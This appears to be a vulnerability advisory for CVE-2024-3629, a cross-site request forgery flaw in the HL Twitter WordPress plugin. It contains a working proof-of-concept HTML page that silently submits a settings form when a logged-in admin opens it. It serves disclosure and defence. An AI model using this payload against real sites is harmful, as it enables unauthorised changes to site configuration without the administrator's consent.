Lucene search
Bob MatyasWPEX-ID:C1F6ED2C-0F84-4B13-B39E-5CB91443C2B1HistoryApr 24, 2024 - 12:00 a.m.
HL Twitter <= 2014.1.18 - Settings Update via CSRF
2024-04-2400:00:00
Bob Matyas
36
twitter security update csrf-notification may 08 2024 users-exploit
Description The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack
Have a logged in admin open an HTML page containing:
```
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/admin.php?page=hl_twitter_settings" method="POST">
<input type="text" name="object[tweet_format]" value="csrf2" />
<input type="text" name="object[auto_tweet]" value="on" />
<input type="text" name="object[archive_slug]" value="csrf2" />
<input type="text" name="object[update_frequency]" value="hl_1hr" />
<input type="submit" name="submit" value="Save" />
</form>
</body>
```Related
nvd
nvd
CVE-2024-3629
2024-05-15 06:15:12
cve
cve
CVE-2024-3629
2024-05-15 06:15:12
wpvulndb
wpvulndb
HL Twitter <= 2014.1.18 - Settings Update via CSRF
2024-04-24 00:00:00
cvelist
cvelist
CVE-2024-3629 HL Twitter <= 2014.1.18 - Settings Update via CSRF
2024-05-15 06:00:03
vulnrichment
vulnrichment
CVE-2024-3629 HL Twitter <= 2014.1.18 - Settings Update via CSRF
2024-05-15 06:00:03
wordfence
wordfence
AI Score
6.7
Confidence
Low
EPSS
0
Percentile
9.0%
Related for WPEX-ID:C1F6ED2C-0F84-4B13-B39E-5CB91443C2B1